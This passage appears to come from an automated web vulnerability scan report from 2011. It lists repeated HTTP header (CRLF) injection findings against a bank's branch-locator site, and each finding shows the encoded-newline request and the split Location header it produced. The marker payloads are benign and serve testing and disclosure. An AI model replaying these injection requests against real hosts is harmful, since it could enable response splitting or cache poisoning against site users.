Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:33 GMT
Server: Apache
Set-Cookie: JSESSIONID=215626237D9E8048F243AF52FD95F277.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/2660b
2cc0e908e4b/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.32. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 350de%0d%0aa3bf9c92b37 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/350de%0d%0aa3bf9c92b37/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:56 GMT
Server: Apache
Set-Cookie: JSESSIONID=6EA6B62B9AA87EB150A5CDFB18557224.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/350de
a3bf9c92b37/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.33. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload bef7d%0d%0a8cd970dc454 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/bef7d%0d%0a8cd970dc454/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:33 GMT
Server: Apache
Set-Cookie: JSESSIONID=B98F7448045847F4557A398EDE8795FD.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/bef7d
8cd970dc454/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.34. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload f0cf4%0d%0a2d758b6c793 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/f0cf4%0d%0a2d758b6c793/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=7AF3F35500F6F3342F0E10E333919C9C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/f0cf4
2d758b6c793/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.35. http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload ee90b%0d%0aa9e8eb97287 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/ee90b%0d%0aa9e8eb97287=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:43 GMT
Server: Apache
Set-Cookie: JSESSIONID=5833F44DFC67D804FBFE17E38F065B8C.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/110__Third__Ave_10003_NEW__YORK_NY/bank_branch_locations/ee90b
a9e8eb97287=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.36. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload cd260%0d%0a39bf67cf311 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/cd260%0d%0a39bf67cf311/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:15 GMT
Server: Apache
Set-Cookie: JSESSIONID=EEAFDDEAF2F1A4BD52519C1BBFFA82AE.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/cd260
39bf67cf311/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.37. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload c1928%0d%0aa7d73bbc261 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/c1928%0d%0aa7d73bbc261/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:48 GMT
Server: Apache
Set-Cookie: JSESSIONID=07E8B5B7241303E877431319E41C7425.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/c1928
a7d73bbc261/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.38. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 69354%0d%0a9258cdcd98f was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/69354%0d%0a9258cdcd98f/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=BCCED6485D413C480F4BDCD998705898.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/69354
9258cdcd98f/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.39. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 50216%0d%0a20db5cabfb7 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/50216%0d%0a20db5cabfb7/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:57 GMT
Server: Apache
Set-Cookie: JSESSIONID=873E446CF959EE202356BF478C0FF93C.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/50216
20db5cabfb7/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.40. http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload dd476%0d%0a1db925a0e61 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/dd476%0d%0a1db925a0e61=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=3EF22AD0CC68F3D859E087521FB02E81.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/116__Fifth__Ave_10011_NEW__YORK_NY/bank_branch_locations/dd476
1db925a0e61=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.41. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload c8c9e%0d%0ace60a1d40d5 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/c8c9e%0d%0ace60a1d40d5/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=B2F9CDEF621A828ACEEC28C8A8BA8718.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/c8c9e
ce60a1d40d5/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.42. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 9fe9f%0d%0a7d353b1d0e8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/9fe9f%0d%0a7d353b1d0e8/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=7258A01047F2292DEF7E70294B4AE31E.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/9fe9f
7d353b1d0e8/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.43. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload d6594%0d%0abb9fc346a27 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/d6594%0d%0abb9fc346a27/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:37 GMT
Server: Apache
Set-Cookie: JSESSIONID=E6A2253AE8506E9C726B1AEEA66A52FD.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/d6594
bb9fc346a27/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.44. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload acec6%0d%0a8d74879e66 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/acec6%0d%0a8d74879e66/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:07 GMT
Server: Apache
Set-Cookie: JSESSIONID=18F32F65BB68CEB7FB683CD615E1F105.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/acec6
8d74879e66/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.45. http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 31f90%0d%0a096eb8f644a was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/31f90%0d%0a096eb8f644a=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:47 GMT
Server: Apache
Set-Cookie: JSESSIONID=253DF984DC70FB4563298308458DD588.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1290__Hooper__Ave_08753_TOMS__RIVER_NJ/bank_branch_locations/31f90
096eb8f644a=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.46. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 75be6%0d%0a586c1c0326e was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/75be6%0d%0a586c1c0326e/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:05 GMT
Server: Apache
Set-Cookie: JSESSIONID=ABE99F2901017E4923B0811368BB68FB.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/75be6
586c1c0326e/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.47. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload ebfb5%0d%0a509d1746ed8 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/ebfb5%0d%0a509d1746ed8/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:20:26 GMT
Server: Apache
Set-Cookie: JSESSIONID=1999DDB4A2259812FFCF8845258ED208.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/ebfb5
509d1746ed8/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.48. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 32455%0d%0af040ab4a4cb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/32455%0d%0af040ab4a4cb/bank_branch_locations/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:21:13 GMT
Server: Apache
Set-Cookie: JSESSIONID=4EE85CEC1EE7ECD8FBD163AEA4240BB1.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/32455
f040ab4a4cb/bank_branch_locations/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.49. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 61d5d%0d%0a8e3757d74e6 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/61d5d%0d%0a8e3757d74e6/action=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:17 GMT
Server: Apache
Set-Cookie: JSESSIONID=881FD53CEA60265030A7EFAE8E30818D.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/61d5d
8e3757d74e6/action=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.50. http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/action=route

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 60e88%0d%0acfec68676f7 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/60e88%0d%0acfec68676f7=route HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:22:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=54FED06A8B0291B7AA04D0616E451F5E.ftb-web1; Path=/locator/locator
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/1801__N.__Hwy__66_74015_CATOOSA_OK/bank_branch_locations/60e88
cfec68676f7=route?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.51. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 8673b%0d%0aa1712c1b972 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /locator/locator/8673b%0d%0aa1712c1b972/bank_branch_locations/ HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 29 Jun 2011 12:19:45 GMT
Server: Apache
Set-Cookie: JSESSIONID=A880435CF4223A61B60A57DE6E6A1A6F.ftb-web1; Path=/locator/locator
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Set-Cookie: testCookie=INFONOW_TEST_COOKIE_SUPPORT; Path=/locator/locator
Location: http://locators.bankofamerica.com/locator/locator/8673b
a1712c1b972/bank_branch_locations/?shouldTest=true
Content-Language: en-US
Content-Length: 0
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

1.52. http://locators.bankofamerica.com/locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/186__Fifth__Ave_10010_NEW__YORK_NY/bank_branch_locations/

Issue detail

